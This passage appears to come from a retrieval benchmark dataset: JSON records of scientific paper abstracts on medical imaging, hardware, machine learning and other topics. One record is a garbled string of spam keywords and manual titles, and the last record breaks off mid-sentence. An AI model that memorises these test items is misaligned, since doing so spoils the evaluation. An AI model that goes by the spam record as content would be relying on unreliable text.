"text": "Use of PET/MR in children has not previously been reported, to the best of our knowledge. Children with systemic malignancies may benefit from the reduced radiation exposure offered by PET/MR. We report our initial experience with PET/MR hybrid imaging and our current established sequence protocol after 21 PET/MR studies in 15 children with multifocal malignant diseases. The effective dose of a PET/MR scan was only about 20% that of the equivalent PET/CT examination. Simultaneous acquisition of PET and MR data combines the advantages of the two previously separate modalities. Furthermore, the technique also enables whole-body diffusion-weighted imaging (DWI) and statements to be made about the biological cellularity and nuclear/cytoplasmic ratio of tumours. Combined PET/MR saves time and resources. One disadvantage of PET/MR is that in order to have an effect, a significantly longer examination time is needed than with PET/CT. In our initial experience, PET/MR has turned out to be an unexpectedly stable and reliable hybrid imaging modality, which generates a complementary diagnostic study of great additional value.",
"title": ""
},
{
"docid": "7146615b79dd39e358dd148e57a01fdb",
"text": "Graphs are one of the key data structures for many real-world computing applications and the importance of graph analytics is ever-growing. While existing software graph processing frameworks improve programmability of graph analytics, underlying general purpose processors still limit the performance and energy efficiency of graph analytics. We architect a domain-specific accelerator, Graphicionado, for high-performance, energy-efficient processing of graph analytics workloads. For efficient graph analytics processing, Graphicionado exploits not only data structure-centric datapath specialization, but also memory subsystem specialization, all the while taking advantage of the parallelism inherent in this domain. Graphicionado augments the vertex programming paradigm, allowing different graph analytics applications to be mapped to the same accelerator framework, while maintaining flexibility through a small set of reconfigurable blocks. This paper describes Graphicionado pipeline design choices in detail and gives insights on how Graphicionado combats application execution inefficiencies on general-purpose CPUs. Our results show that Graphicionado achieves a 1.76-6.54x speedup while consuming 50-100x less energy compared to a state-of-the-art software graph analytics processing framework executing 32 threads on a 16-core Haswell Xeon processor.",
"title": ""
},
{
"docid": "1f004fe1fc51270006ca32961c36a601",
"text": "A clock multiplier for the 600 MHz 72 W (estimated) CMOS Alpha microprocessor is presented. The supply voltage of the analog part of the PLL (VDDA) is provided by an on-chip voltage regulator with a decoupling capacitance. The 3.3 V supply is used to generate the quieter internal supply voltage needed for the sensitive analog part of the PLL and allows the regulator to operate properly even if the 3.3 V supply is noisy. A bandgap voltage reference is used to generate an internal reference for the supply voltage of 2.2 V. The regulator PSRR is always larger than 20 dB in the frequency range of the power supply noise, reducing the noise amplitude on the analog-supply voltage. The minimum measured supply voltage for the regulator is 2.5 V with a regulated output of 2.2 V (without noise generator).",
"title": ""
},
{
"docid": "95ae44469494aff0f511e77d7924ed36",
"text": "In a practical training for the Faculty of Electrical Engineering at Eindhoven University of Technology, a literature search to the past developments concerning the Phase Correlation algorithm was carried out and the algorithm was implemented. The Phase Correlation algorithm is a method for measuring the motion in a video sequence, based on the Fourier shift theorem. It was found that an enhanced implementation of the Phase Correlation algorithm gives very good results, comparable to the results of 3-D Recursive Search (a popular method for motion estimation in consumer electronics equipment). The estimated motion vectors have a close relation to the true motion in a scene, which makes this algorithm very suitable for video format conversion. It is concluded that Phase Correlation and 3-D Recursive Search, together with object based motion estimation, are the best methods for motion estimation currently available.",
"title": ""
},
{
"docid": "d686f12b9c0a9ce7b84fb7834ee935f5",
"text": "Computer aided diagnosis is a hot research field. Systems with the ability to provide a highly accurate diagnosis using little resources are highly desirable. One type of such systems depend on medical images to provide instantaneous diagnosis based on some discriminative features extracted from the images after processing them for noise removal and enhancement. In this paper, we propose a system to automatically detect fractures in hand bones using x-ray images. To the best of our knowledge, this problemhave never been addressed before. For a first attempt to tackle such a difficult problem, our system performed incredibly good with a 91.8% accuracy.",
"title": ""
},
{
"docid": "28d75588fdb4ff45929da124b001e8cc",
"text": "We present a novel training framework for neural sequence models, particularly for grounded dialog generation. The standard training paradigm for these models is maximum likelihood estimation (MLE), or minimizing the cross-entropy of the human responses. Across a variety of domains, a recurring problem with MLE trained generative neural dialog models (G) is that they tend to produce ‘safe’ and generic responses (‘I don’t know’, ‘I can’t tell’). In contrast, discriminative dialog models (D) that are trained to rank a list of candidate human responses outperform their generative counterparts; in terms of automatic metrics, diversity, and informativeness of the responses. However, D is not useful in practice since it can not be deployed to have real conversations with users. Our work aims to achieve the best of both worlds – the practical usefulness of G and the strong performance of D – via knowledge transfer from D to G. Our primary contribution is an end-to-end trainable generative visual dialog model, where G receives gradients from D as a perceptual (not adversarial) loss of the sequence sampled from G. We leverage the recently proposed Gumbel-Softmax (GS) approximation to the discrete distribution – specifically, a RNN augmented with a sequence of GS samplers, coupled with the straight-through gradient estimator to enable end-to-end differentiability. We also introduce a stronger encoder for visual dialog, and employ a self-attention mechanism for answer encoding along with a metric learning loss to aid D in better capturing semantic similarities in answer responses. Overall, our proposed model outperforms state-of-the-art on the VisDial dataset by a significant margin (2.67% on recall@10). The source code can be downloaded from https://github.com/jiasenlu/visDial.pytorch",
"title": ""
},
{
"docid": "e16319df7a10e8b2564c11815f721712",
"text": "A new image feature description based on the local wavelet pattern (LWP) is proposed in this paper to characterize the medical computer tomography (CT) images for content-based CT image retrieval. In the proposed work, the LWP is derived for each pixel of the CT image by utilizing the relationship of center pixel with the local neighboring information. In contrast to the local binary pattern that only considers the relationship between a center pixel and its neighboring pixels, the presented approach first utilizes the relationship among the neighboring pixels using local wavelet decomposition, and finally considers its relationship with the center pixel. A center pixel transformation scheme is introduced to match the range of center value with the range of local wavelet decomposed values. Moreover, the introduced local wavelet decomposition scheme is centrally symmetric and suitable for CT images. The novelty of this paper lies in the following two ways: 1) encoding local neighboring information with local wavelet decomposition and 2) computing LWP using local wavelet decomposed values and transformed center pixel values. We tested the performance of our method over three CT image databases in terms of the precision and recall. We also compared the proposed LWP descriptor with the other state-of-the-art local image descriptors, and the experimental results suggest that the proposed method outperforms other methods for CT image retrieval.",
"title": ""
},
{
"docid": "e996e2622c26782d8fc0023aaaf4d84c",
"text": "This paper proposes that the appropriate measure for capturing the political aspects that matter for social conflict is the level of inclusiveness of the political system. I analyze, theoretically and empirically, the relationship between inclusiveness of the political system and its stability. According to the model, high inclusive systems, such as the proportional representation system, are more stable than low inclusive systems that favor political exclusion, such as the majoritarian system. Empirically, it seems that democracy is not enough to deter social conflicts. The level of inclusiveness of the political system is important in explaining the probability of civil wars. D 2004 Elsevier B.V. All rights reserved. JEL classification: H11; O11",
"title": ""
},
{
"docid": "6965b52a011bc47eb302d7602dd8bcba",
"text": "We have developed a simple and expandable procedure for classification and validation of extracellular data based on a probabilistic model of data generation. This approach relies on an empirical characterization of the recording noise. We first use this noise characterization to optimize the clustering of recorded events into putative neurons. As a second step, we use the noise model again to assess the quality of each cluster by comparing the within-cluster variability to that of the noise. This second step can be performed independently of the clustering algorithm used, and it provides the user with quantitative as well as visual tests of the quality of the classification.",
"title": ""
},
{
"docid": "67cd5acd5ed21b34980acd70253cf124",
"text": "NAND Flash has followed Moore's law of scaling for several generations. With the minimum half-pitch going below 20nm, transition to a 3D NAND cell is required to continue the scaling. This paper describes a floating gate based 3D NAND technology with superior cell characteristics relative to 2D NAND, and CMOS under array for high Gb/mm2 density.",
"title": ""
},
{
"docid": "7495dddc411728986307bae0557b4d50",
"text": "spoken natural language dialog systems a practical approach spoken natural language dialog systems: a practical approach spoken natural language dialog systems a practical approach spoken natural language dialog systems a practical alternative english on kalyani university pdf alongz back to basics fundamental education questions re examined a statistical approach to spoken dialog systems design and mountain: a translation-based approach to natural language implementation of domcat: the domain complexity analysis c algebras and operator theory ceyway large-scale software integration for spoken language and poetry as research exploring second language poetry otoo imperdonable nolia longman english grammar practice with answer key storytown teacher resource book grade 5 ebook | ufcgymmatthews service manual for chevrolet cruze 2010 alongz 70cc atv parts user manual compax land tenure in the colonies wmcir ten pains of death alongs llc bank resolution form wmcir autocad 2007 guide book louduk gator xuv 620i manual firext dl 91a and dl 91b sivaji project x origins white book band oxford level 10 working the samuel johnson encyclopedia iwsun preparatory 2013 memorandam paper 2 sdunn ged practice worksheets with answers eleina dismantled pleasures nolia health care dialogue systems: practical and theoretical cet study guide download ramonapropertymanagers flickering light return to avalore book 0 cafebr miller levine ch 18 test answers codact",
"title": ""
},
{
"docid": "280c39aea4584e6f722607df68ee28dc",
"text": "Statistical parametric speech synthesis (SPSS) using deep neural networks (DNNs) has shown its potential to produce naturally-sounding synthesized speech. However, there are limitations in the current implementation of DNN-based acoustic modeling for speech synthesis, such as the unimodal nature of its objective function and its lack of ability to predict variances. To address these limitations, this paper investigates the use of a mixture density output layer. It can estimate full probability density functions over real-valued output features conditioned on the corresponding input features. Experimental results in objective and subjective evaluations show that the use of the mixture density output layer improves the prediction accuracy of acoustic features and the naturalness of the synthesized speech.",
"title": ""
},
{
"docid": "6d83a242e4e0a0bd0d65c239e0d6777f",
"text": "Traditional clustering algorithms consider all of the dimensions of an input data set equally. However, in the high dimensional data, a common property is that data points are highly clustered in subspaces, which means classes of objects are categorized in subspaces rather than the entire space. Subspace clustering is an extension of traditional clustering that seeks to find clusters in different subspaces categorical data and its corresponding time complexity is analyzed as well. In the proposed algorithm, an additional step is added to the k-modes clustering process to automatically compute the weight of all dimensions in each cluster by using complement entropy. Furthermore, the attribute weight can be used to identify the subsets of important dimensions that categorize different clusters. The effectiveness of the proposed algorithm is demonstrated with real data sets and synthetic data sets. & 2012 Elsevier B.V. All rights reserved.",
"title": ""
},
{
"docid": "f15508a8cd342cb6ea0ec2d0328503d7",
"text": "An order book consists of a list of all buy and sell offers, represented by price and quantity, available to a market agent. The order book changes rapidly, within fractions of a second, due to new orders being entered into the book. The volume at a certain price level may increase due to limit orders, i.e. orders to buy or sell placed at the end of the queue, or decrease because of market orders or cancellations. In this paper a high-dimensional Markov chain is used to represent the state and evolution of the entire order book. The design and evaluation of optimal algorithmic strategies for buying and selling is studied within the theory of Markov decision processes. General conditions are provided that guarantee the existence of optimal strategies. Moreover, a value-iteration algorithm is presented that enables finding optimal strategies numerically. As an illustration a simple version of the Markov chain model is calibrated to high-frequency observations of the order book in a foreign exchange market. In this model, using an optimally designed strategy for buying one unit provides a significant improvement, in terms of the expected buy price, over a naive buy-one-unit strategy.",
"title": ""
},
{
"docid": "49388f99a08a41d713b701cf063a71be",
"text": "In this paper, we present the first-of-its-kind machine learning (ML) system, called AI Programmer, that can automatically generate full software programs requiring only minimal human guidance. At its core, AI Programmer uses genetic algorithms (GA) coupled with a tightly constrained programming language that minimizes the overhead of its ML search space. Part of AI Programmer’s novelty stems from (i) its unique system design, including an embedded, hand-crafted interpreter for efficiency and security and (ii) its augmentation of GAs to include instruction-gene randomization bindings and programming language-specific genome construction and elimination techniques. We provide a detailed examination of AI Programmer’s system design, several examples detailing how the system works, and experimental data demonstrating its software generation capabilities and performance using only mainstream CPUs.",
"title": ""
},
{
"docid": "929f294583267ca8cb8616e803687f1e",
"text": "Recent systems for natural language understanding are strong at overcoming linguistic variability for lookup style reasoning. Yet, their accuracy drops dramatically as the number of reasoning steps increases. We present the first formal framework to study such empirical observations, addressing the ambiguity, redundancy, incompleteness, and inaccuracy that the use of language introduces when representing a hidden conceptual space. Our formal model uses two interrelated spaces: a conceptual meaning space that is unambiguous and complete but hidden, and a linguistic symbol space that captures a noisy grounding of the meaning space in the symbols or words of a language. We apply this framework to study the connectivity problem in undirected graphs---a core reasoning problem that forms the basis for more complex multi-hop reasoning. We show that it is indeed possible to construct a high-quality algorithm for detecting connectivity in the (latent) meaning graph, based on an observed noisy symbol graph, as long as the noise is below our quantified noise level and only a few hops are needed. On the other hand, we also prove an impossibility result: if a query requires a large number (specifically, logarithmic in the size of the meaning graph) of hops, no reasoning system operating over the symbol graph is likely to recover any useful property of the meaning graph. This highlights a fundamental barrier for a class of reasoning problems and systems, and suggests the need to limit the distance between the two spaces, rather than investing in multi-hop reasoning with\"many\"hops.",
"title": ""
},
{
"docid": "b059f6d2e9f10e20417f97c05d92c134",
"text": "We present a hybrid analog/digital very large scale integration (VLSI) implementation of a spiking neural network with programmable synaptic weights. The synaptic weight values are stored in an asynchronous Static Random Access Memory (SRAM) module, which is interfaced to a fast current-mode event-driven DAC for producing synaptic currents with the appropriate amplitude values. These currents are further integrated by current-mode integrator synapses to produce biophysically realistic temporal dynamics. The synapse output currents are then integrated by compact and efficient integrate and fire silicon neuron circuits with spike-frequency adaptation and adjustable refractory period and spike-reset voltage settings. The fabricated chip comprises a total of 32 × 32 SRAM cells, 4 × 32 synapse circuits and 32 × 1 silicon neurons. It acts as a transceiver, receiving asynchronous events in input, performing neural computation with hybrid analog/digital circuits on the input spikes, and eventually producing digital asynchronous events in output. Input, output, and synaptic weight values are transmitted to/from the chip using a common communication protocol based on the Address Event Representation (AER). Using this representation it is possible to interface the device to a workstation or a micro-controller and explore the effect of different types of Spike-Timing Dependent Plasticity (STDP) learning algorithms for updating the synaptic weights values in the SRAM module. We present experimental results demonstrating the correct operation of all the circuits present on the chip.",
"title": ""
},
{
"docid": "ef584ca8b3e9a7f8335549927df1dc16",
"text": "Rapid evolution in technology and the internet brought us to the era of online services. E-commerce is nothing but trading goods or services online. Many customers share their good or bad opinions about products or services online nowadays. These opinions become a part of the decision-making process of consumer and make an impact on the business model of the provider. Also, understanding and considering reviews will help to gain the trust of the customer which will help to expand the business. Many users give reviews for the single product. Such thousands of review can be analyzed using big data effectively. The results can be presented in a convenient visual form for the non-technical user. Thus, the primary goal of research work is the classification of customer reviews given for the product in the map-reduce framework.",
"title": ""
},
{
"docid": "544426cfa613a31ac903041afa946d89",
"text": "Recommender systems have the effect of guiding users in a personalized way to interesting objects in a large space of possible options. Content-based recommendation systems try to recommend items similar to those a given user has liked in the past. Indeed, the basic process performed by a content-based recommender consists in matching up the attributes of a user profile in which preferences and interests are stored, with the attributes of a content object (item), in order to recommend to the user new interesting items. This chapter provides an overview of content-based recommender systems, with the aim of imposing a degree of order on the diversity of the different aspects involved in their design and implementation. The first part of the chapter presents the basic concepts and terminology of contentbased recommender systems, a high level architecture, and their main advantages and drawbacks. The second part of the chapter provides a review of the state of the art of systems adopted in several application domains, by thoroughly describing both classical and advanced techniques for representing items and user profiles. The most widely adopted techniques for learning user profiles are also presented. The last part of the chapter discusses trends and future research which might lead towards the next generation of systems, by describing the role of User Generated Content as a way for taking into account evolving vocabularies, and the challenge of feeding users with serendipitous recommendations, that is to say surprisingly interesting items that they might not have otherwise discovered. Pasquale Lops Department of Computer Science, University of Bari “Aldo Moro”, Via E. Orabona, 4, Bari (Italy) e-mail: lops@di.uniba.it Marco de Gemmis Department of Computer Science, University of Bari “Aldo Moro”, Via E. Orabona, 4, Bari (Italy) e-mail: degemmis@di.uniba.it Giovanni Semeraro Department of Computer Science, University of Bari “Aldo Moro”, Via E. Orabona, 4, Bari (Italy) e-mail: semeraro@di.uniba.it",
"title": ""
},
{
"docid": "fa012857ec951bf6365559ab734e9367",
"text": "The aim of this study is to examine the teachers’ attitudes toward the inclusion of students with special educational needs, in public schools and how these attitudes are influenced by their self-efficacy perceptions. The sample is comprised of 416 preschool, primary and secondary education teachers. The results show that, in general, teachers develop positive attitude toward the inclusive education. Higher self-efficacy was associated rather with their capacity to come up against negative experiences at school, than with their attitude toward disabled learners in the classroom and their ability to meet successfully the special educational needs students. The results are consistent with similar studies and reveal the need of establishing collaborative support networks in school districts and the development of teacher education programs, in order to achieve the enrichment of their knowledge and skills to address diverse needs appropriately.",
"title": ""
}
] | scidocsrr |
ac2a1e075ca36eaa89eede0c4179eb1d | Towards dense volumetric pancreas segmentation in CT using 3D fully convolutional networks | [
{
"docid": "ed3b8bfdd6048e4a07ee988f1e35fd21",
"text": "Accurate and automatic organ segmentation from 3D radiological scans is an important yet challenging problem for medical image analysis. Specifically, as a small, soft, and flexible abdominal organ, the pancreas demonstrates very high inter-patient anatomical variability in both its shape and volume. This inhibits traditional automated segmentation methods from achieving high accuracies, especially compared to the performance obtained for other organs, such as the liver, heart or kidneys. To fill this gap, we present an automated system from 3D computed tomography (CT) volumes that is based on a two-stage cascaded approach-pancreas localization and pancreas segmentation. For the first step, we localize the pancreas from the entire 3D CT scan, providing a reliable bounding box for the more refined segmentation step. We introduce a fully deep-learning approach, based on an efficient application of holistically-nested convolutional networks (HNNs) on the three orthogonal axial, sagittal, and coronal views. The resulting HNN per-pixel probability maps are then fused using pooling to reliably produce a 3D bounding box of the pancreas that maximizes the recall. We show that our introduced localizer compares favorably to both a conventional non-deep-learning method and a recent hybrid approach based on spatial aggregation of superpixels using random forest classification. The second, segmentation, phase operates within the computed bounding box and integrates semantic mid-level cues of deeply-learned organ interior and boundary maps, obtained by two additional and separate realizations of HNNs. By integrating these two mid-level cues, our method is capable of generating boundary-preserving pixel-wise class label maps that result in the final pancreas segmentation. Quantitative evaluation is performed on a publicly available dataset of 82 patient CT scans using 4-fold cross-validation (CV). We achieve a (mean ± std. dev.) Dice similarity coefficient (DSC) of 81.27 ± 6.27% in validation, which significantly outperforms both a previous state-of-the art method and a preliminary version of this work that report DSCs of 71.80 ± 10.70% and 78.01 ± 8.20%, respectively, using the same dataset.",
"title": ""
}
] | [
{
"docid": "7765be2199056aed0cb463d215363f83",
"text": "This paper describes a machine learning approach for extracting automatically the tongue contour in ultrasound images. This method is developed in the context of visual articulatory biofeedback for speech therapy. The goal is to provide a speaker with an intuitive visualization of his/her tongue movement, in real-time, and with minimum human intervention. Contrary to most widely used techniques based on active contours, the proposed method aims at exploiting the information of all image pixels to infer the tongue contour. For that purpose, a compact representation of each image is extracted using a PCA-based decomposition technique (named EigenTongue). Artificial neural networks are then used to convert the extracted visual features into control parameters of a PCA-based tongue contour model. The proposed method is evaluated on 9 speakers, using data recorded with the ultrasound probe hold manually (as in the targeted application). Speaker-dependent experiments demonstrated the effectiveness of the proposed method (with an average error of ~1.3 mm when training from 80 manually annotated images), even when the tongue contour is poorly imaged. The performance was significantly lower in speaker-independent experiments (i.e. when estimating contours on an unknown speaker), likely due to anatomical differences across speakers.",
"title": ""
},
{
"docid": "de345f612927b08f3ba2f0c9e8720c93",
"text": "Inputs causing a program to fail are usually large and often contain information irrelevant to the failure. It thus helps debugging to simplify program inputs. The Delta Debugging algorithm is a general technique applicable to minimizing all failure-inducing inputs for more effective debugging. In this paper, we present HDD, a simple but effective algorithm that significantly speeds up Delta Debugging and increases its output quality on tree structured inputs such as XML. Instead of treating the inputs as one flat atomic list, we apply Delta Debugging to the very structure of the data. In particular, we apply the original Delta Debugging algorithm to each level of a program's input, working from the coarsest to the finest levels. We are thus able to prune the large irrelevant portions of the input early. All the generated input configurations are syntactically valid, reducing the number of inconclusive configurations that need to be tested and accordingly the amount of time spent simplifying. We have implemented HDD and evaluated it on a number of real failure-inducing inputs from the GCC and Mozilla bugzilla databases. Our Hierarchical Delta Debugging algorithm produces simpler outputs and takes orders of magnitude fewer test cases than the original Delta Debugging algorithm. It is able to scale to inputs of considerable size that the original Delta Debugging algorithm cannot process in practice. We argue that HDD is an effective tool for automatic debugging of programs expecting structured inputs.",
"title": ""
},
{
"docid": "470e354d364e54fecb39828847e0dc68",
"text": "Online solvers for partially observable Markov decision processes have been applied to problems with large discrete state spaces, but continuous state, action, and observation spaces remain a challenge. This paper begins by investigating double progressive widening (DPW) as a solution to this challenge. However, we prove that this modification alone is not sufficient because the belief representations in the search tree collapse to a single particle causing the algorithm to converge to a policy that is suboptimal regardless of the computation time. The main contribution of the paper is to propose a new algorithm, POMCPOW, that incorporates DPW and weighted particle filtering to overcome this deficiency and attack continuous problems. Simulation results show that these modifications allow the algorithm to be successful where previous approaches fail.",
"title": ""
},
{
"docid": "f4427b472b6e94faadbd49e422ef9200",
"text": "Amlinger, L. 2017. The type I-E CRISPR-Cas system. Biology and applications of an adaptive immune system in bacteria. Digital Comprehensive Summaries of Uppsala Dissertations from the Faculty of Science and Technology 1466. 61 pp. Uppsala: Acta Universitatis Upsaliensis. ISBN 978-91-554-9787-3. CRISPR-Cas systems are adaptive immune systems in bacteria and archaea, consisting of a clustered regularly interspaced short palindromic repeats (CRISPR) array and CRISPR associated (Cas) proteins. In this work, the type I-E CRISPR-Cas system of Escherichia coli was studied. CRISPR-Cas immunity is divided into three stages. In the first stage, adaptation, Cas1 and Cas2 store memory of invaders in the CRISPR array as short intervening sequences, called spacers. During the expression stage, the array is transcribed, and subsequently processed into small CRISPR RNAs (crRNA), each consisting of one spacer and one repeat. The crRNAs are bound by the Cascade multi-protein complex. During the interference step, Cascade searches for DNA molecules complementary to the crRNA spacer. When a match is found, the target DNA is degraded by the recruited Cas3 nuclease. Host factors required for integration of new spacers into the CRISPR array were first investigated. Deleting recD, involved in DNA repair, abolished memory formation by reducing the concentration of the Cas1-Cas2 expression plasmid, leading to decreased amounts of Cas1 to levels likely insufficient for spacer integration. Deletion of RecD has an indirect effect on adaptation. To facilitate detection of adaptation, a sensitive fluorescent reporter was developed where an out-of-frame yfp reporter gene is moved into frame when a new spacer is integrated, enabling fluorescent detection of adaptation. Integration can be detected in single cells by a variety of fluorescence-based methods. A second aspect of this thesis aimed at investigating spacer elements affecting target interference. Spacers with predicted secondary structures in the crRNA impaired the ability of the CRISPR-Cas system to prevent transformation of targeted plasmids. Lastly, in absence of Cas3, Cascade was successfully used to inhibit transcription of specific genes by preventing RNA polymerase access to the promoter. The CRISPR-Cas field has seen rapid development since the first demonstration of immunity almost ten years ago. However, much research remains to fully understand these interesting adaptive immune systems and the research presented here increases our understanding of the type I-E CRISPR-Cas system.",
"title": ""
},
{
"docid": "71215e59838861228f316da921b7f6b7",
"text": "In this paper, we present two multilevel spin-orbit torque magnetic random access memories (SOT-MRAMs). A single-level SOT-MRAM employs a three-terminal SOT device as a storage element with enhanced endurance, close-to-zero read disturbance, and low write energy. However, the three-terminal device requires the use of two access transistors per cell. To improve the integration density, we propose two multilevel cells (MLCs): 1) series SOT MLC and 2) parallel SOT MLC, both of which store two bits per memory cell. A detailed analysis of the bit-cell suggests that the S-MLC is promising for applications requiring both high density and low write-error rate, and P-MLC is particularly suitable for high-density and low-write-energy applications. We also performed iso-bit-cell area comparison of our MLC designs with previously proposed MLCs that are based on spin-transfer torque MRAM and show 3-16× improvement in write energy.",
"title": ""
},
{
"docid": "8e2242a14c1d671b2c6fd068759c7944",
"text": "Part I of this two-part paper provided an overview of the HAZUS-MH Flood Model and a discussion of its capabilities for characterizing riverine and coastal flooding. Included was a discussion of the Flood Information Tool, which permits rapid analysis of a wide variety of stream discharge data and topographic mapping to determine flood-frequencies over entire floodplains. This paper reports on the damage and loss estimation capability of the Flood Model, which includes a library of more than 900 damage curves for use in estimating damage to various types of buildings and infrastructure. Based on estimated property damage, the model estimates shelter needs and direct and indirect economic losses arising from floods. Analyses for the effects of flood warning, the benefits of levees, structural elevation, and flood mapping restudies are also facilitated with the Flood Model. DOI: 10.1061/ ASCE 1527-6988 2006 7:2 72 CE Database subject headings: Floods; Damage; Estimation; Models; Mapping.",
"title": ""
},
{
"docid": "d16ec1f4c32267a07b1453d45bc8a6f2",
"text": "Knowledge representation learning (KRL), exploited by various applications such as question answering and information retrieval, aims to embed the entities and relations contained by the knowledge graph into points of a vector space such that the semantic and structure information of the graph is well preserved in the representing space. However, the previous works mainly learned the embedding representations by treating each entity and relation equally which tends to ignore the inherent imbalance and heterogeneous properties existing in knowledge graph. By visualizing the representation results obtained from classic algorithm TransE in detail, we reveal the disadvantages caused by this homogeneous learning strategy and gain insight of designing policy for the homogeneous representation learning. In this paper, we propose a novel margin-based pairwise representation learning framework to be incorporated into many KRL approaches, with the method of introducing adaptivity according to the degree of knowledge heterogeneity. More specially, an adaptive margin appropriate to separate the real samples from fake samples in the embedding space is first proposed based on the sample’s distribution density, and then an adaptive weight is suggested to explicitly address the trade-off between the different contributions coming from the real and fake samples respectively. The experiments show that our Adaptive Weighted Margin Learning (AWML) framework can help the previous work achieve a better performance on real-world Knowledge Graphs Freebase and WordNet in the tasks of both link prediction and triplet classification.",
"title": ""
},
{
"docid": "dd57aeca3efe7bba99f141b4536b1a9c",
"text": "The dislocation stress memorization technique (D-SMT) stressor is demonstrated to boost the device performance on the Si three-dimensional (3-D) FinFET device. The larger channel stress and mobility enhancement ratio are observed in the narrower gate width device, due to the effect of triple crystal re-growth directions on the 3-D FinFET device. In this paper, ~33% mobility enhancement and ~23% Id,sat improvement on the Si FinFET device with W/L of 100/60 nm are achieved successfully with the implement of D-SMT stressor.",
"title": ""
},
{
"docid": "2710a25b3cf3caf5ebd5fb9f08c9e5e3",
"text": "Your use of the JSTOR archive indicates your acceptance of JSTOR's Terms and Conditions of Use, available at http://www.jstor.org/page/info/about/policies/terms.jsp. JSTOR's Terms and Conditions of Use provides, in part, that unless you have obtained prior permission, you may not download an entire issue of a journal or multiple copies of articles, and you may use content in the JSTOR archive only for your personal, non-commercial use.",
"title": ""
},
{
"docid": "a5e01cfeb798d091dd3f2af1a738885b",
"text": "It is shown by an extensive benchmark on molecular energy data that the mathematical form of the damping function in DFT-D methods has only a minor impact on the quality of the results. For 12 different functionals, a standard \"zero-damping\" formula and rational damping to finite values for small interatomic distances according to Becke and Johnson (BJ-damping) has been tested. The same (DFT-D3) scheme for the computation of the dispersion coefficients is used. The BJ-damping requires one fit parameter more for each functional (three instead of two) but has the advantage of avoiding repulsive interatomic forces at shorter distances. With BJ-damping better results for nonbonded distances and more clear effects of intramolecular dispersion in four representative molecular structures are found. For the noncovalently-bonded structures in the S22 set, both schemes lead to very similar intermolecular distances. For noncovalent interaction energies BJ-damping performs slightly better but both variants can be recommended in general. The exception to this is Hartree-Fock that can be recommended only in the BJ-variant and which is then close to the accuracy of corrected GGAs for non-covalent interactions. According to the thermodynamic benchmarks BJ-damping is more accurate especially for medium-range electron correlation problems and only small and practically insignificant double-counting effects are observed. It seems to provide a physically correct short-range behavior of correlation/dispersion even with unmodified standard functionals. In any case, the differences between the two methods are much smaller than the overall dispersion effect and often also smaller than the influence of the underlying density functional.",
"title": ""
},
{
"docid": "92ca87957f5b97d2b249bc73e9d9a48d",
"text": "Methods for text simplification using the framework of statistical machine translation have been extensively studied in recent years. However, building the monolingual parallel corpus necessary for training the model requires costly human annotation. Monolingual parallel corpora for text simplification have therefore been built only for a limited number of languages, such as English and Portuguese. To obviate the need for human annotation, we propose an unsupervised method that automatically builds the monolingual parallel corpus for text simplification using sentence similarity based on word embeddings. For any sentence pair comprising a complex sentence and its simple counterpart, we employ a many-to-one method of aligning each word in the complex sentence with the most similar word in the simple sentence and compute sentence similarity by averaging these word similarities. The experimental results demonstrate the excellent performance of the proposed method in a monolingual parallel corpus construction task for English text simplification. The results also demonstrated the superior accuracy in text simplification that use the framework of statistical machine translation trained using the corpus built by the proposed method to that using the existing corpora.",
"title": ""
},
{
"docid": "2a15dfdf9c9a225ef1328e72100f8035",
"text": "We present an efficient numerical strategy for the Bayesian solution of inverse problems. Stochastic collocation methods, based on generalized polynomial chaos (gPC), are used to construct a polynomial approximation of the forward solution over the support of the prior distribution. This approximation then defines a surrogate posterior probability density that can be evaluated repeatedly at minimal computational cost. The ability to simulate a large number of samples from the posterior distribution results in very accurate estimates of the inverse solution and its associated uncertainty. Combined with high accuracy of the gPC-based forward solver, the new algorithm can provide great efficiency in practical applications. A rigorous error analysis of the algorithm is conducted, where we establish convergence of the approximate posterior to the true posterior and obtain an estimate of the convergence rate. It is proved that fast (exponential) convergence of the gPC forward solution yields similarly fast (exponential) convergence of the posterior. The numerical strategy and the predicted convergence rates are then demonstrated on nonlinear inverse problems of varying smoothness and dimension. AMS subject classifications: 41A10, 60H35, 65C30, 65C50",
"title": ""
},
{
"docid": "a383d9b392a58f6ba8a7192104e99600",
"text": "In this correspondence, we present a new universal entropy estimator for stationary ergodic sources, prove almost sure convergence, and establish an upper bound on the convergence rate for finite-alphabet finite memory sources. The algorithm is motivated by data compression using the Burrows-Wheeler block sorting transform (BWT). By exploiting the property that the BWT output sequence is close to a piecewise stationary memoryless source, we can segment the output sequence and estimate probabilities in each segment. Experimental results show that our algorithm outperforms Lempel-Ziv (LZ) string-matching-based algorithms.",
"title": ""
},
{
"docid": "7808ed17e6e7fa189e6b33922573af56",
"text": "The communication needs of Earth observation satellites is steadily increasing. Within a few years, the data rate of such satellites will exceed 1 Gbps, the angular resolution of sensors will be less than 1 μrad, and the memory size of onboard data recorders will be beyond 1 Tbytes. Compared to radio frequency links, optical communications in space offer various advantages such as smaller and lighter equipment, higher data rates, limited risk of interference with other communications systems, and the effective use of frequency resources. This paper describes and compares the major features of radio and optical frequency communications systems in space and predicts the needs of future satellite communications.",
"title": ""
},
{
"docid": "e03b0d954f52e6880a7b37bc346ae471",
"text": "1 I n t r o d u c t i o n Many induction algorithms construct models with unnecessary structure. These models contain components tha t do not improve accuracy, and tha t only reflect random variation in a single da ta sample. Such models are less efficient to store and use than their correctly-sized counterparts . Using these models requires the collection of unnecessary data. Portions of these models are wrong and mislead users. Finally, excess s tructure can reduce the accuracy of induced models on new data [8]. For induction algorithms tha t build decision trees [1, 7, 10], pruning is a common approach to remove excess structure. Pruning methods take an induced tree, examine individual subtrees, and remove those subtrees deemed unnecessary. Pruning methods differ primarily in the criterion used to judge subtrees. Many criteria have been proposed, including statistical significance tests [10], corrected error est imates [7], and minimum description length calculations [9]. In this paper, we bring together three threads of our research on excess structure and decision tree pruning. First, we show that several common methods for pruning decision trees still retain excess structure. Second, we explain this phenomenon in terms of statistical decision making with incorrect reference distributions. Third, we present a method tha t adjusts for incorrect reference distributions, and we present an experiment that evaluates the method. Our analysis indicates that many existing techniques for building decision trees fail to consider the statistical implications of examining many possible subtrees. We show how a simple adjustment can allow such systems to make valid statistical inferences in this specific situation. X. Liu, P. Cohen, M. Berthold (Eds.): \"Advances in Intelligent Data Analysis\" (IDA-97) LNCS 1280, pp. 211-222, 1997. 9 Springer-Verlag Berlin Heidelberg 1997 212 JENSEN, GATES, AND COHEN 2 O b s e r v i n g E x c e s s S t r u c t u r e Consider Figure 1, which shows a typical plot of tree size and accuracy as a function of training set size for the UCI a u s t r a l i a n dataset. 1 Moving from leftto-right in the graph corresponds to 